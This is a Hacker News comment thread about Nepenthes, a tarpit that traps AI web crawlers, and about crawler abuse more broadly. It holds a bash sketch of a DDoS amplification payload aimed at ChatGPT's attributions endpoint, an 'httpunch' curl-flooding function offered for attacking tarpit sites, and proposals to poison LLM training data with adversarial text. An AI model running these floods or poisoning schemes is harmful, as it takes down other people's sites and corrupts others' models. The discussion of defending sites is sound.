Nepenthes is a tarpit to catch AI web crawlers
289 comments
· January 16, 2025 · bflesch
hassleblad23
I am not surprised that OpenAI is not interested in fixing this.
bflesch
Their security.txt email address replies and asks you to go on BugCrowd. BugCrowd staff is unwilling (or too incompetent) to run a bash curl command to reproduce the issue, while also refusing to forward it to OpenAI.
The support@openai.com address waits an hour before answering with a ChatGPT-generated answer.
Issues raised on GitHub directly towards their engineers were not answered.
Also, Microsoft CERT & the Azure security team do not reply or respond to such things (maybe due to lack of demonstrated impact).
permo-w
why try this hard for a private company that doesn't employ you?
khana
[dead]
JohnMakin
Nice find, I think one of my sites actually got recently hit by something like this. And yea, this kind of thing should be trivially preventable if they cared at all.
zanderwohl
IDK, I feel that if you're doing 5000 HTTP calls to another website it's kind of good manners to fix that. But OpenAI has never cared about the public commons.
chefandy
Nobody in this space gives a fuck about anyone outside of the people paying for their top-tier services, and even then, they only care about them when their bill is due. They don't care about their regular users, don't care about the environment, don't care about the people that actually made the "data" they're re-selling... nobody.
marginalia_nu
Yeah, even beyond common decency, there's pretty strong incentives to fix it, as it's a fantastic way of having your bot's fingerprint end up on Cloudflare's shitlist.
dewey
> And yea, this kind of thing should be trivially preventable if they cared at all.
Most of the time when someone says something is "trivial" without knowing anything about the internals, it's never trivial.
As someone working close to the b2c side of a business, I can't count the number of times I've heard that something should be trivial while it's something we've thought about for years.
bflesch
The technical flaws are quite trivial to spot, if you have the relevant experience:
- urls[] parameter has no size limit
- urls[] parameter is not deduplicated (but their cache is deduplicating, so this security control was there at some point but is ineffective now)
- their requests to the same website / DNS / victim IP address rotate through all available Azure IPs, which puts them at risk of being blocked by other hosters. They should come from the same IP address. I noticed them changing to other Azure IP ranges several times, most likely because they got blocked/rate-limited by Hetzner or other counterparties from which I was playing around with this vulnerability.
But if their team is too limited to recognize security risks, there is nothing one can do. Maybe they were occupied last week with the office gossip around the sexual assault lawsuit against Sam Altman. Maybe they still had holidays or there was another, higher-risk security vulnerability.
Having interacted with several bug bounty programs in the past, it feels like OpenAI is not very mature in that regard. Also, why do they choose BugCrowd when HackerOne is much better in my experience?
grahamj
If you’re unable to throttle your own outgoing requests you shouldn’t be making any
jillyboel
now try to reply to the actual content instead of some generalizing grandstanding bullshit
michaelbuckbee
What is the https://chatgpt.com/backend-api/attributions endpoint doing (or responsible for, when not crushing websites)?
bflesch
When ChatGPT cites web sources in its output to the user, it will call `backend-api/attributions` with the URL, and the API will return what the website is about.
Basically it does an HTTP request to fetch the HTML `<title/>` tag.
They don't check length of supplied `urls[]` array and also don't check if it contains the same URL over and over again (with minor variations).
It's just bad engineering all around.
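For illustration, a rough sketch of what an abusive payload could look like. The urls[] field name comes from the behavior described above; the exact method, headers, and request shape are in my writeup, so treat those parts here as placeholders, and the target host is deliberately not the real endpoint:

    # build a urls[] array repeating one victim URL with minor variations
    victim="https://victim.example/page"
    urls=$(for i in $(seq 1 5000); do printf '"%s?v=%d",' "$victim" "$i"; done)
    payload="{\"urls\":[${urls%,}]}"

    # one request shaped like this fanned out into thousands of fetches against
    # the victim; sent to a placeholder host here, not the live attributions API
    curl -s -X POST "https://chatgpt.example.invalid/backend-api/attributions" \
        -H "Content-Type: application/json" \
        -d "$payload"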
bentcorner
Slightly weird that this even exists - shouldn't the backend generating the chat output know what attribution it needs, and just ask the attributions api itself? Why even expose this to users?
JohnMakin
Even if you were unwilling to change this behavior on the application layer or server side, you could add a directive in the proxy to prevent such large payloads from being accepted, as an immediate mitigation step, unless they seriously need that parameter to hold an unlimited number of URLs (guessing they have it set to some default like 2 MB and it will break at some limit, but I am afraid to play with this too much). Somehow I doubt they need that? I don't know though.
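To make that concrete, a hedged sketch assuming an nginx reverse proxy sits in front of the API; the path, upstream name, snippet location, and the 64k figure are all made up for illustration, not their actual setup:

    # cap the accepted request body size for the attributions route only;
    # this snippet would be included inside the relevant server {} block
    printf '%s\n' \
        'location /backend-api/attributions {' \
        '    client_max_body_size 64k;                # reject oversized urls[] payloads outright' \
        '    proxy_pass http://attributions_backend;  # hypothetical upstream name' \
        '}' > /etc/nginx/snippets/attributions-limit.conf
    nginx -t && nginx -s reload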
andai
Is 5000 a lot? I'm out of the loop but I thought c10k was solved decades ago? Or is it about the "burstiness" of it?
(That all the requests come in simultaneously -- probably SSL code would be the bottleneck.)
bflesch
I'm not a DDOS expert and didn't test out the limits due to potential harm to OpenAI.
Based on my experience I recognized it as a potential security risk and framed it as DDOS because there's a big amplification factor: 1 API request via Cloudflare -> 5000 incoming requests from OpenAI
- their requests come in simultaneously from different IPs
- each request downloads up to 10 MB of random data (tested with a multi-GB file)
- the requests come from different Azure IP ranges, either because they kept switching them or because of different geolocations.
- if you block them on the firewall their requests still hammer your server (it's not like the first request notices it can't establish connection and then the next request TO SAME IP would stop)
I tried to get it recognized and fixed, and now apparently HN did its magic because they've disabled the API :)
Previously, their engineers might have argued that this is a feature and not a bug. But now that they have disabled it, it shows that this clearly isn't intended behavior.
hombre_fatal
c10k is about efficiently scheduling socket connections. It doesn't make sense in this context, nor is it the same as 10k rps.
anthony42c
Where does the 5000 HTTP request limit come from? Is that the limit of the URLs array?
I was curious to learn more about the endpoint, but can't find any online API docs. The docs ChatGPT suggests are defined for api.openapi.com, rather than chatgpt.com/backend-api.
I wonder if it's reasonable (from a functional perspective) for the attributions endpoint not to place a limit on the number of URLs used for attribution. I guess potentially ChatGPT could reference hundreds of sites and thousands of web pages in searching for a complex question that covered a range of different interrelated topics? Or do I misunderstand the intended usage of that endpoint?
smokel
Am I correct in understanding that you waited at most one week for a reply?
In my experience with large companies, that's rather short. Some nudging may be required every now and then, but expecting a response so fast seems slightly unreasonable to me.
pabs3
Could those 5000 HTTP requests be made to go back to the ChatGPT API?
m3047
Having first run a bot motel in I think 2005, I'm thrilled and greatly entertained to see this taking off. When I first did it, I had crawlers lost in it literally for days; and you could tell that eventually some human would come back and try to suss the wreckage. After about a year I started seeing URLs like ../this-page-does-not-exist-hahaha.html. Sure it's an arms race but just like security is generally an afterthought these days, don't think that you can't be the woodpecker which destroys civilization. The comments are great too, this one in particular reflects my personal sentiments:
> the moment it becomes the basic default install ( ala adblocker in browsers for people ), it does not matter what the bigger players want to do
taikahessu
We had our non-profit website drained of bandwidth and the site temporarily shut down (!!) under our hosting deal because of the Amazon bot aggressively crawling URLs like ?page=21454 ... etc.
Thankfully, Siteground restored our site without any repercussions, as it was not our fault. Added the Amazon bot to robots.txt after that one.
Don't like how things are right now. Is a tarpit the solution? Or better laws? Would they stop the Chinese bots? Should they even? I don't know.
jsheard
For the "good" bots which at least respect robots.txt you can use this list to get ahead of them before they pummel your site.
https://github.com/ai-robots-txt/ai.robots.txt
There's no easy solution for bad bots which ignore robots.txt and spoof their UA though.
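A minimal way to pull that list in, assuming the repo still publishes a ready-made robots.txt at its root (check the repo layout; the destination path and the robots.local.txt file holding your own rules are just examples):

    # fetch the maintained AI-crawler robots.txt and merge it ahead of your own rules
    curl -fsSL https://raw.githubusercontent.com/ai-robots-txt/ai.robots.txt/main/robots.txt \
        > /tmp/ai-robots.txt
    cat /tmp/ai-robots.txt /var/www/example.com/robots.local.txt > /var/www/example.com/robots.txt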
breakingcups
Such as OpenAI, who will ignore robots.txt and change their user agent to evade blocks, apparently[1]
1: https://www.reddit.com/r/selfhosted/comments/1i154h7/openai_...
zcase
For those looking, this is the best I've found: https://blog.cloudflare.com/declaring-your-aindependence-blo...
maeil
This seemed to work for some time when it came out but IME no longer does.
taikahessu
Thanks, will look into that!
mrweasel
> We had our non-profit website drained out of bandwidth
There are a number of sites having issues with scrapers (AI and others) generating so much traffic that transit providers are informing them that their fees will go up with the next contract renewal if the traffic is not reduced. It's just very hard for the individual sites to do much about it, as most of the traffic stems from AWS, GCP or Azure IP ranges.
It is a problem and the AI companies do not care.
bee_rider
It is too bad we don’t have a convention already for the internet:
User/crawler: I’d like site
Server: ok that’ll be $.02 for me to generate it and you’ll have to pay $.01 in bandwidth costs, plus whatever your provider charges you
User: What? Obviously as a human I don’t consume websites so fast that $.03 will matter to me, sure, add it to my cable bill.
Crawler: Oh no, I’m out of money, (business model collapse).
jmholla
I think that's a terrible idea, especially with ISP monopolies that love gouging their customers. They have a demonstrable history of markups well beyond their means.
And I hope you're pricing this highly. I don't know about you, but I would absolutely notice $.03 a site on my bill, just from my human browsing.
In fact, I feel like this strategy would further put the Internet in the hands of the aggregators as that's the one site you know you can get information from, so long term that cost becomes a rounding error for them as people are funneled to their AI as their memberships are cheaper than accessing the rest of the web.
nosioptar
I want better laws. The bot operator should have to pay you damages for taking down your site.
If acting like inconsiderate tools starts costing money, they may stop.
Havoc
What blows my mind is that this is functionally a solved problem.
The big search crawlers have been around for years & manage to mostly avoid nuking sites into oblivion. Then the AI gang shows up - supposedly the smartest guys around - and suddenly we're re-inventing the wheel on crawling and causing carnage in the process.
jeroenhd
Search crawlers have the goal of directing people towards the websites they crawl. They have a symbiotic relationship, so they put in (some) effort not to blow websites out of the water with their crawling, because a website that's offline is useless for your search index.
AI crawlers don't care about directing people towards websites. They intend to replace websites, and are only interested in copying whatever information is on them. They are greedy crawlers that would only benefit from knocking a website offline after they're done, because then the competition can't crawl the same website.
The goals are different, so the crawlers behave differently, and websites need to deal with them differently. In my opinion the best approach is to ban any crawler that's not directly attached to a search engine through robots.txt, and to use offensive techniques to take out sites that ignore your preferences. Anything from randomly generated text to straight up ZIP bombs is fair game when it comes to malicious crawlers.
freetonik
>Search crawlers have the goal of directing people towards the websites they crawl. They have a symbiotic relationship, so they put in (some) effort not to blow websites out of the water with their crawling, because a website that's offline is useless for your search index.
Ultimately not true. Google started showing pre-parsed "quick cards" instead of links a long time ago. The incentives of ad-driven search engines are to keep the visitors on the search engine rather than direct them to the source.
marginalia_nu
> The incentives of ad-driven search engines are to keep the visitors on the search engine rather than direct them to the source.
It's more complicated than that. Google's incentives are to keep the visitors on the search engine only if the search result doesn't have Google ads. Though it's ultimately self-defeating I think, and the reason for their decline in perceived quality. If you go back to the backrub whitepaper from 1998, you'll find Brin and Page outlining this exact perverse incentive as the reason why their competitors sucked.
dmix
FWIW when I research stuff through ChatGPT I click on the source links all the time. It usually only summarizes stuff. For ex: if you're shopping for a certain product it won't bring you to the store page where all the reviews are. It will just make a top ten list type thing quickly.
marginalia_nu
I think it's largely the mindset of moving fast and breaking things that's at fault. If you ship it at "good enough", it will not behave well.
Building a competent well-behaved crawler is a big effort that requires relatively deep understanding of more or less all web tech, and figuring out a bunch of stuff that is not documented anywhere and not part of any specs.
dspillett
Tarpits to slow down the crawling may stop them crawling your entire site, but they'll not care unless a great many sites do this. Your site will be assigned a thread or two at most and the rest of the crawling machine resources will be off scanning other sites. There will be timeouts to stop a particular site even keeping a couple of cheap threads busy for long. And anything like this may get you delisted from search results you might want to be in as it can be difficult to reliably identify these bots from others and sometimes even real users, and if things like this get good enough to be any hassle to the crawlers they'll just start lying (more) and be even harder to detect.
People scraping for nefarious reasons have had decades of other people trying to stop them, so mitigation techniques are well known unless you can come up with something truly unique.
I don't think random Markov chain based text generators are going to pose much of a problem to LLM training scrapers either. They'll have rate limits and vast attention spreading too. Also I suspect that random pollution isn't going to have as much effect as people think because of the way the inputs are tokenised. It will have an effect, but this will be massively dulled by the randomness – statistically relatively unique information and common (non random) combinations will still bubble up obviously in the process.
I think better would be to have less random pollution: use a small set of common text to pollute the model. Something like “this was a common problem with Napoleonic genetic analysis due to the pre-frontal nature of the ongoing stream process, as is well documented in the grimoire of saint Churchill the III, 4th edition, 1969”, in fact these snippets could be Markov generated, but use the same few repeatedly. They would need to be nonsensical enough to be obvious noise to a human reader, or highlighted in some way that the scraper won't pick up on, but a general intelligence like most humans would (perhaps a CSS styled side-note inlined in the main text? — though that would likely have accessibility issues), and you would need to cycle them out regularly or scrapers will get “smart” and easily filter them out, but them appearing fully, numerous times, might mean they have more significant effect on the tokenising process than more entirely random text.
hinkley
If it takes them 100 times the average crawl time to crawl my site, that is an opportunity cost to them. Of course 'time' is fuzzy here because it depends how they're batching. The way most bots work is to pull a fixed number of replies in parallel per target, so if you double your response time then you halve the number of request per hour they slam you with. That definitely affects your cluster size.
However if they split ask and answer, or other threads for other sites can use the same CPUs while you're dragging your feet returning a reply, then as you say, just IO delays won't slow them down. You've got to use their CPU time as well. That won't be accomplished by IO stalls on your end, but could potentially be done by adding some highly compressible gibberish on the sending side so that you create more work without proportionately increasing your bandwidth bill. But that could be tough to do without increasing your CPU bill.
dspillett
> If it takes them 100 times the average crawl time to crawl my site, that is an opportunity cost to them.
If it takes 100 times the average crawl time per page on your site, which is one of many tens (hundreds?) of thousands of sites, many of which may be bigger, unless they are doing one site at a time, so your site causes a full queue stall, such efforts likely amount to no more than statistical noise.
hinkley
Again, that delay is mostly about me, and my employer, not the rest of the world.
However if you are running a SaaS or hosting service with thousands of domain names routing to your servers, then this dynamic becomes a little more important, because now the spider can be hitting you for fifty different domain names at the same time.
larsrc
I've been considering setting up "ConfuseAIpedia" in a similar manner using sentence templates and a large set of filler words. Obviously with a warning for humans. I would set it up with an appropriate robots.txt blocking crawlers so only unethical crawlers would read it. I wouldn't try to tarpit beyond protecting my own server, as confusing rogue AI scrapers is more interesting than slowing them down a bit.
dzhiurgis
Can you put some topic in the tarpit that you don't want LLMs to learn about? Say, put a bunch of info about a competitor so that it learns to avoid it?
dspillett
Unlikely. If the process abandons your site because it takes too long to get any data, it'll not associate the data it did get with the failure, just your site. The information about your competitor it did manage to read before giving up will still go in the training pile, and even if it doesn't the process would likely pick up the same information from elsewhere too.
The only effect tar-pitting might have is to reduce the chance of information unique to your site getting into the training pool, and that stops if other sites quote chunks of your work (much like avoiding GitHub because you don't want your f/oss code going into their training models has no effect if someone else forks your work and pushes their variant to GitHub).
kerkeslager
Question: do these bots not respect robots.txt?
I haven't added these scrapers to my robots.txt on the sites I work on yet because I haven't seen any problems. I would run something like this on my own websites, but I can't see selling my clients on running this on their websites.
The websites I run generally have a honeypot page which is linked in the headers and disallowed to everyone in the robots.txt, and if an IP visits that page, they get added to a blocklist which simply drops their connections without response for 24 hours.
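Roughly, that setup looks like this, as a sketch assuming an nginx access log in the default combined format, a /honeypot path, and ipset/iptables for the 24-hour drop (all of those specifics are placeholders for whatever your stack uses):

    # IP set whose entries expire after 24 hours, plus a rule that drops matches
    ipset create honeypot hash:ip timeout 86400 2>/dev/null
    iptables -I INPUT -m set --match-set honeypot src -j DROP

    # any client that requests the disallowed honeypot page gets added to the set;
    # field 7 of the default combined log format is the request path
    tail -F /var/log/nginx/access.log | while read -r ip _ _ _ _ _ path _; do
        if [[ $path == /honeypot* ]]; then
            ipset add -exist honeypot "$ip"
        fi
    done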
0xf00ff00f
> The websites I run generally have a honeypot page which is linked in the headers and disallowed to everyone in the robots.txt, and if an IP visits that page, they get added to a blocklist which simply drops their connections without response for 24 hours.
I love this idea!
griomnib
Yeah, this is elegant as fuck.
Dwedit
Even something like a special URL that auto-bans you can be abused by pranksters. Simply embedding an <img> tag that fetches the offending URL could trigger it, as well as tricking people into clicking a link.
jesprenj
This could be mitigated by having a special secret token in this honeypot URL that limits the time validity of the honeypot URL and ties it to the IP address that this URL is for, let's say: http://example/honeypot/hex(sha256(ipaddress | today(yyyy-mm-dd) | secret))
This special URL with the token would be in an anchor tag somewhere in the footer of every website, but hidden by a CSS rule, and a "Disallow: /honeypot" rule would be included in robots.txt.
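A quick sketch of generating that token server-side (the separator, variable names, and where the client IP comes from are just placeholders):

    # hex(sha256(ipaddress | today(yyyy-mm-dd) | secret)), as described above
    secret="change-me"                 # shared secret, rotate as needed
    ip="$REMOTE_ADDR"                  # client address, e.g. from a CGI-style env var
    token=$(printf '%s|%s|%s' "$ip" "$(date +%F)" "$secret" | sha256sum | awk '{print $1}')
    echo "/honeypot/$token"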
kerkeslager
Ehhh, is there any reason I should be worried about that? The <img> tag would have to be in a spot where users are likely to go, otherwise users will never view the <img> tag. A link of any kind to the honeypot isn't likely to, for example, go viral on social media, because it's going to appear as a broken link/image and nobody will upvote it. I'm not seeing an attack vector that gets this link in front of my users with enough frequency to be worth considering.
A bigger concern is arguably users who are all behind the same IP address, i.e. some of the sites I work on have employee-only parts which can only be accessed via VPN, so in theory one employee could get the whole company banned, and that would be tricky to figure out. So far that hasn't been a problem, but now that I'm thinking about it, maybe I should have a whitelist override for that. :)
throw_m239339
> Question: do these bots not respect robots.txt?
No they don't, because there is no potential legal liability for not respecting that file in most countries.
jonatron
You haven't seen any problems because you created a solution to the problem!
kerkeslager
Well, I wasn't the original developer who set up every site I work on. Some of the sites I work on don't have this implemented because I wasn't the one who set them up initially.
pona-a
It feels like a Markov chain isn't adversarial enough.
Maybe you can use an open-weights model, assuming that all LLMs converge on similar representations, and use beam search with inverted probability and repetition penalty, or just GPT-2/LLaMA output with amplified activations to try and bork the projection matrices, or write pages and pages of phonetically faux-English text to affect how the BPE tokenizer gets fitted, or anything else more sophisticated and deliberate than random noise.
All of these would take more resources than a Markov chain, but if the scraper is smart about ignoring such link traps, a periodically rotated selection of adversarial examples might be even better.
Nightshade had comparatively great success, discounting that its perturbations aren't that robust to rescaling. LLM training corpora are filtered very coarsely and take all they can get, unlike the more motivated attacker in Nightshade's threat model trying to fine-tune on one's style. Text is also quite hard to alter without a human noticing, except annoying zero-width Unicode which is easily stripped, so there's no pretense of preserving legibility; I think it might work very well if seriously attempted.
FridgeSeal
What does “borking the projection matrices” and affecting the BPE tokeniser mean/look like here?
Are we just trying to produce content that will pass as human-like (therefore get stripped out by coarse filtering) but has zero or negative informational utility to the model? That would mean, theoretically if enough is trained on it would actively worsen the model performance right?
quchen
Unless this concept becomes a mass phenomenon with many implementations, isn’t this pretty easy to filter out? And furthermore, since this antagonizes billion-dollar companies that can spin up teams doing nothing but browse Github and HN for software like this to prevent polluting their datalakes, I wonder whether this is a very efficient approach.
marcus0x62
Author of a similar tool here[0]. There are a few implementations of this sort of thing that I know of. Mine is different in that the primary purpose is to slightly alter content statically using a Markov generator, mainly to make it useless for content reposters, secondarily to make it useless to LLM crawlers that ignore my robots.txt file[1]. I assume the generated text is bad enough that the LLM crawlers just throw the result out. Other than the extremely poor quality of the text, my tool doesn't leave any fingerprints (like recursive non-sense links.) In any case, it can be run on static sites with no server-side dependencies so long as you have a way to do content redirection based on User-Agent, IP, etc.
My tool does have a second component - linkmaze - which generates a bunch of nonsense text with a Markov generator, and serves infinite links (like Nepenthes does) but I generally only throw incorrigible bots at it (and, as others have noted in-thread, most crawlers already set some kind of limit on how many requests they'll send to a given site, especially a small site.) I do use it for PHP-exploit crawlers as well, though I've seen no evidence those fall into the maze -- I think they mostly just look for some string indicating a successful exploit and move on if whatever they're looking for isn't present.
But, for my use case, I don't really care if someone fingerprints content generated by my tool and avoids it. That's the point: I've set robots.txt to tell these people not to crawl my site.
In addition to Quixotic (my tool) and Nepenthes, I know of:
* https://github.com/Fingel/django-llm-poison
* https://codeberg.org/MikeCoats/poison-the-wellms
* https://codeberg.org/timmc/marko/
0 - https://marcusb.org/hacks/quixotic.html
1 - I use the ai.robots.txt user agent list from https://github.com/ai-robots-txt/ai.robots.txt
tremon
poison-the-wellms
I gotta give props for this project name.
btilly
It would be more efficient for them to spin up a team to study this robots.txt thing. They've ignored that low hanging fruit, so they won't do the more sophisticated thing any time soon.
iugtmkbdfil834
I forget which fiction book covered this phenomenon ( Rainbow's End? ), but the moment it becomes the basic default install ( ala adblocker in browsers for people ), it does not matter what the bigger players want to do ; they are not actively fighting against determined and possibly radicalized users.
WD-42
Does it need to be efficient if it’s easy? I wrote a similar tool except it’s not a performance tarpit. The goal is to slightly modify otherwise organic content so that it is wrong, but only for AI bots. If they catch on and stop crawling the site, nothing is lost. https://github.com/Fingel/django-llm-poison
reedf1
The idea is that you place this in parallel to the rest of your website routes, that way your entire server might get blacklisted by the bot.
focusedone
But it's fun, right?
grajaganDev
I am not sure. How would crawlers filter this?
marginalia_nu
You limit the crawl time or number of requests per domain for all domains, and set the limit proportional to how important the domain is.
There's a ton of these types of things online, you can't e.g. exhaustively crawl every Wikipedia mirror someone's put online.
captainmuon
Check if the response time, the length of the "main text", or other indicators are in the lowest few percentile -> send to the heap for manual review.
Does the inferred "topic" of the domain match the topic of the individual pages? If not -> manual review. And there are many more indicators.
Hire a bunch of student jobbers, have them search github for tarpits, and let them write middleware to detect those.
If you are doing broad crawling, you already need to do this kind of thing anyway.
dylan604
> Hire a bunch of student jobbers,
Do people still do this, or do they just off shore the task?
pmarreck
It's not. It's rather pointless and, frankly, nearsighted. And we can DDoS sites like this just as offensively, simply by making many requests to them, since its own docs say its Markov generation is computationally expensive, but it is NOT expensive for even one person to make many requests to it. Just expensive to host. So feel free to use this bash function to defeat these:
    httpunch() {
      local url=$1
      local connections=${2:-${HTTPUNCH_CONNECTIONS:-100}}
      local action=$1
      local keepalive_time=${HTTPUNCH_KEEPALIVE:-60}
      local silent_mode=false

      # Check if "kill" was passed as the first argument
      if [[ $action == "kill" ]]; then
        echo "Killing all curl processes..."
        pkill -f "curl --no-buffer"
        return
      fi

      # Parse optional --silent argument
      for arg in "$@"; do
        if [[ $arg == "--silent" ]]; then
          silent_mode=true
          break
        fi
      done

      # Ensure URL is provided if "kill" is not used
      if [[ -z $url ]]; then
        echo "Usage: httpunch [kill | <url>] [number_of_connections] [--silent]"
        echo "Environment variables: HTTPUNCH_CONNECTIONS (default: 100), HTTPUNCH_KEEPALIVE (default: 60)."
        return 1
      fi

      echo "Starting $connections connections to $url..."
      for ((i = 1; i <= connections; i++)); do
        if $silent_mode; then
          curl --no-buffer --silent --output /dev/null --keepalive-time "$keepalive_time" "$url" &
        else
          curl --no-buffer --keepalive-time "$keepalive_time" "$url" &
        fi
      done

      echo "$connections connections started with a keepalive time of $keepalive_time seconds."
      echo "Use 'httpunch kill' to terminate them."
    }
(Generated in a few seconds with the help of an LLM of course.) Your free speech is also my free speech. LLMs are just a very useful tool, and Llama for example is open-source and also needs to be trained on data. And I <opinion> just can't stand knee-jerk-anticorporate AI-doomers who decide to just create chaos instead of using that same energy to try to steer the progress </opinion>.
WD-42
You called the parent unintelligent yet need an LLM to show you how to run curl in a loop. Yikes.
thruway516
The 21st century script kiddy
pmarreck
Your assumption that I couldn't have written this myself or that I didn't make corrections to it is telling. I've only been doing dev for 30+ years lol
LLMs are an accelerant, like all previous tools... Not a replacement, although it seems most people still need to figure that out for themselves while I already have
flir
"I'm not lazy, I'm efficient" - Heinlein
scudsworth
"Ah, my favorite ADD tech nomad! adjusts monocle"
- https://gist.github.com/pmarreck/970e5d040f9f91fd9bce8a4bcee...
alt187
The tarpit is made for LLM crawlers who don't respect robots.txt. Do you love LLMs so much that you wish that they wouldn't have to respect this stupid, anticorporate AI-doomer robots.txt convention so they can pry out of the greedy hands of the webserver one more URL?
Maybe you just had a knee-jerk reaction.
jjuhl
Why just catch the ones ignoring robots.txt? Why not explicitly allow them to crawl everything, but silently detect AI bots and quietly corrupt the real content so it becomes garbage to them while leaving it unaltered for real humans? Seems to me that would have a greater chance of actually poisoning their models and eventually make this AI/LLM crap go away.
hartator
There are already “infinite” websites like these on the Internet.
Crawlers (both AI and regular search) have a set number of pages they want to crawl per domain. This number is usually determined by the popularity of the domain.
Unknown websites will get very few crawls per day whereas popular sites millions.
Source: I am the CEO of SerpApi.
dawnerd
Looking at my logs for all of my sites, this isn't a global truth. I see multiple AI crawlers hammering away requesting the same pages many, many times. Perplexity and Facebook are basically nonstop.
jonatron
I just looked at the logs for a site, and I saw PerplexityBot is looking at the robots.txt and ignoring it. They don't provide a list of IPs to verify if it is actually them. Anyway, just for anyone with PerplexityBot in their user agent, they can get increasingly bad responses until the abuse stops.
dawnerd
Perplexity is exceptionally bad because they say they respect robots.txt but clearly don't. When pressed on it they basically shrug and say too bad, don't put stuff in public if you don't want it crawled. They got a UA block in Cloudflare and it seems like that did the trick.
hartator
What do you mean by many, many times?
palmfacehn
Even a brand new site will get hit heavily by crawlers. Amazonbot, Applebot, LLM bots, scrapers abusing FB's link preview bot, SEO metric bots and more than a few crawlers out of China. The desirable, well behaved crawlers are the only ones who might lose interest.
The typical entry point is a sitemap or RSS feed.
Overall I think the author is misguided in using the tarpit approach. Slow sites get fewer crawls. I would suggest using easily GZIP'd content and deeply nested tags instead. There are also tricks with XSL, but I doubt many mature crawlers will fall for that one.
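A rough sketch of that idea: repetitive, deeply nested markup that compresses to almost nothing on the wire but costs the crawler real memory and parse time (the sizes and tag choice are arbitrary):

    # ~5 MB of deeply nested, highly repetitive HTML gzips down to a tiny file
    { printf '<!doctype html><html><body>'
      for i in $(seq 1 200000); do printf '<div><p>padding</p>'; done
      for i in $(seq 1 200000); do printf '</div>'; done
      printf '</body></html>'
    } | gzip -9 > trap.html.gz
    ls -lh trap.html.gz    # serve it with Content-Encoding: gzip so it stays small in transit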
pilif
> Unknown websites will get very few crawls per day whereas popular sites millions.
we're hosting some pretty unknown, very domain-specific sites and are getting hammered by Claude and others who, compared to old-school search engine bots, also get caught up in the weeds and request the same pages all over.
They also seem to not care about response time of the page they are fetching, because when they are caught in the weeds and hit some super bad performing edge-cases, they do not seem to throttle at all and continue to request at 30+ requests per second even when a page takes more than a second to be returned.
We can of course handle this and make them go away, but in the end, this behavior will only hurt them both because they will face more and more opposition by web masters and because they are wasting their resources.
For decades, our solution for search engine bots was basically an empty robots.txt and have the bots deal with our sites. Bots behaved reasonably and intelligently enough that this was a working strategy.
Now in light of the current AI bots which from an outsider observer's viewpoint look like they were cobbled together with the least effort possible, this strategy is no longer viable and we would have to resort to provide a meticulously crafted robots.txt to help each hacked-up AI bot individually to not get lost in the weeds.
Or, you know, we just blanket ban them.
kccqzy
The fact that AI bots seem like they were cobbled together with the least effort possible might be related. The people responsible for these bots might have zero experience writing an old school search engine bot and have no idea of the kind of edge cases that would be encountered. They might just turn to LLMs to write their bot code which is not exactly a recipe for success.
angoragoats
This may be true for large, established crawlers for Google, Bing, et al. I don’t see how you can make this a blanket statement for all crawlers, and my own personal experience tells me this isn’t correct.
marginalia_nu
These things are so common having some way of dealing with them is basically mandatory if you plan on doing any sort of large scale crawling.
That said, crawlers are fairly bug prone, so misbehaving crawlers is also a relatively common sight. It's genuinely difficult to properly test a crawler, and useless to build it from specs, since the realities of the web are so far off the charted territory, any test you build is testing against something that's far removed from what you'll actually encounter. With real web data, the corner cases have corner cases, and the HTTP and HTML specs are but vague suggestions.
angoragoats
I am aware of all of the things you mention (I've built crawlers before).
My point was only that there are plenty of crawlers that don't operate in the way the parent post described. If you want to call them buggy that's fine.
marginalia_nu
Yeah, I agree with this. These types of roach motels have been around for decades and are at this point well understood and not much of a problem for anyone. You basically need to be able to deal with them to do any sort of large scale crawling.
The reality of web crawling is that the web is already extremely adversarial and any crawler will get every imaginable nonsense thrown at it, ranging from various TCP tar pits, compression and XML bombs, really there's no end to what people will put online.
A more resource effective technique to block misbehaving crawlers is to have a hidden link on each page, to some path forbidden via robots.txt, randomly generated perhaps so they're always unique. When that link is fetched, the server immediately drops the connection and blocks the IP for some time period.
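For the "randomly generated so they're always unique" part, a tiny sketch of emitting a one-off trap link on each page render (the /trap/ prefix is a placeholder and must match a Disallow rule in robots.txt):

    # unique, throwaway honeypot path for this page render
    trap_path="/trap/$(head -c16 /dev/urandom | xxd -p)"
    printf '<a href="%s" style="display:none" rel="nofollow">do not follow</a>\n' "$trap_path"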
diggan
> There are already “infinite” websites like these on the Internet.
Cool. And how much of the software driving these websites is FOSS and I can download and run it for my own (popular enough to be crawled more than daily by multiple scrapers) website?
gruez
Off the top of my head: https://everyuuid.com/
johnisgood
How is that infinite if the last one is always the same? Am I misunderstanding this? I assumed it is almost like an infinite scroll or something.
diggan
Aren't those finite lists? How is a scraper (normal or LLM) supposed to "get stuck" on those?
hartator
Every not-found page that doesn't return a 404 HTTP status is basically an infinite trap.
It’s useless to do this though as all crawlers have a way to handle this. It’s very crawler 101.
qwe----3
This certainly violates the TOS for using Google.
p0nce
A brand new site with no users gets 1k requests a month from bots; the CO2 cost must be atrocious.
tivert
> A brand new site with no users gets 1k requests a month from bots; the CO2 cost must be atrocious.
Yep: https://www.energy.gov/articles/doe-releases-new-report-eval...:
> The report finds that data centers consumed about 4.4% of total U.S. electricity in 2023 and are expected to consume approximately 6.7 to 12% of total U.S. electricity by 2028. The report indicates that total data center electricity usage climbed from 58 TWh in 2014 to 176 TWh in 2023 and estimates an increase between 325 to 580 TWh by 2028.
A graph in the report says in data centers used 1.9% in 2018.
p0nce
s/a month/a day
benlivengood
A little humorous; it's a 502 Bad Gateway error right now and I don't know if I am classified as an AI web crawler or it's just overloaded.
marginalia_nu
The reason these types of slow-response tarpits aren't recommended is that you're basically building an instrument for denial of service for your own website. What happens is the server is the one that ends up holding a bunch of slow connections, many more so than any given client.
a_c
We need a tarpit that feeds AI their own hallucinations. Make the Habsburg dynasty of AI a reality.
Cthulhu_
There was an article about that the other day having to do with image generation, and while it didn't exactly create Habsburg chins, there were definite problems after a few generations. I can't find it though :/
bflesch
Haha, this would be an amazing way to test the ChatGPT crawler reflective DDOS vulnerability [1] I published last week.
Basically a single HTTP Request to ChatGPT API can trigger 5000 HTTP requests by ChatGPT crawler to a website.
The vulnerability is/was thoroughly ignored by OpenAI/Microsoft/BugCrowd, but I really wonder what would happen when the ChatGPT crawler interacts with this tarpit several times per second. As the ChatGPT crawler is using various Azure IP ranges, I actually think the tarpit would crash first.
The vulnerability reporting experience with OpenAI / BugCrowd was really horrific. It's always difficult to get attention for DOS/DDOS vulnerabilities and companies always act like they are not a problem. But if their system goes dark and the CEO calls then suddenly they accept it as a security vulnerability.
I spent a week trying to reach OpenAI/Microsoft to get this fixed, but I gave up and just published the writeup.
I don't recommend exploiting this vulnerability, for legal reasons.
[1] https://github.com/bf/security-advisories/blob/main/2025-01-...